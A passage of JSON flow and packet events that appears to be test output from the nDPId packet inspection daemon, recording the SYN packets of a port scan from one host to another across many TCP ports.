-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_packet_id":1,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060661,"pkt":"ACYLMQczACWzv5HuCABFAAAsrMwAAC4GbaasEAAIQA2GNIzTB+XdU4MZAAAAAGACDAAkpwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060693,"flow_last_seen":1278275060693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060693,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1114,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1454,"flow_packet_id":1,"flow_last_seen":1278275060693,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060693,"pkt":"ACYLMQczACWzv5HuCABFAAAs8uUAACYGL42sEAAIQA2GNIzTBFrdU4MZAAAAAGACDAAoMgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1465,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsvn0AAC0GXPWsEAAIQA2GNIzTH0jdU4MZAAAAAGACCAARRAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1466,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsiAIAADgGiHCsEAAIQA2GNIzTBR7dU4MZAAAAAGACBAAvbgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1467,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsIScAAC0G+kusEAAIQA2GNIzTF3LdU4MZAAAAAGACCAAZGgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":593,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1468,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1458,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsoGcAADIGdgusEAAIQA2GNIzTAlHdU4MZAAAAAGACDAAqOwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1469,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAshhwAACcGm1asEAAIQA2GNIzT8czdU4MZAAAAAGACEAA2vwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1460,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsU1UAADoGux2sEAAIQA2GNIzTS5bdU4MZAAAAAGACDADg9QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1471,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1461,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsEgUAADgG\/m2sEAAIQA2GNIzTHz\/dU4MZAAAAAGACBAAVTQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1472,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1462,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsBjQAADAGEj+sEAAIQA2GNIzTYODdU4MZAAAAAGACBADTqwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1473,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsG38AADYG9vOsEAAIQA2GNIzTDPvdU4MZAAAAAGACDAAfkQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1474,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsV1gAACgGyRqsEAAIQA2GNIzTAZfdU4MZAAAAAGACBAAy9QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":146,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1475,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1465,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsso4AADcGXuSsEAAIQA2GNIzTAJLdU4MZAAAAAGACEAAn+gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1476,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1466,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsJu4AACgG+YSsEAAIQA2GNIzTH1\/dU4MZAAAAAGACBAAVLQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1477,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsyyYAADkGREysEAAIQA2GNIzTAtDdU4MZAAAAAGACCAAtvAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1478,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1468,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAssr4AADYGX7SsEAAIQA2GNIzTF9TdU4MZAAAAAGACDAAUuAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060694,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1479,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1469,"flow_packet_id":1,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060694,"pkt":"ACYLMQczACWzv5HuCABFAAAsicIAADMGi7CsEAAIQA2GNIzSFrfdUoMYAAAAAGACEAAR2AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060695,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1480,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1470,"flow_packet_id":1,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060695,"pkt":"ACYLMQczACWzv5HuCABFAAAsP70AADsGzbWsEAAIQA2GNIzSITTdUoMYAAAAAGACEAAHWwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060695,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1481,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_packet_id":1,"flow_last_seen":1278275060695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060695,"pkt":"ACYLMQczACWzv5HuCABFAAAsHbsAACcGA7isEAAIQA2GNIzSBALdUoMYAAAAAGACEAAkjQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1482,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/twAADMGFpasEAAIQA2GNIzSPozdUoMYAAAAAGACEADqAgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1483,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAsECUAACsGDU6sEAAIQA2GNIzSnQHdUoMYAAAAAGACEACLjQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1474,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAsdZEAADYGnOGsEAAIQA2GNIzSB5vdUoMYAAAAAGACDAAk9AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1485,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAs38EAADAGOLGsEAAIQA2GNIzSFiLdUoMYAAAAAGACBAAebQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060697,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1486,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1476,"flow_packet_id":1,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060697,"pkt":"ACYLMQczACWzv5HuCABFAAAssGMAACsGbQ+sEAAIQA2GNIzSFGrdUoMYAAAAAGACEAAUJQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060698,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1487,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_packet_id":1,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060698,"pkt":"ACYLMQczACWzv5HuCABFAAAsUY0AADUGweWsEAAIQA2GNIzSI1DdUoMYAAAAAGACCAANPwAAAgQFtA=="} 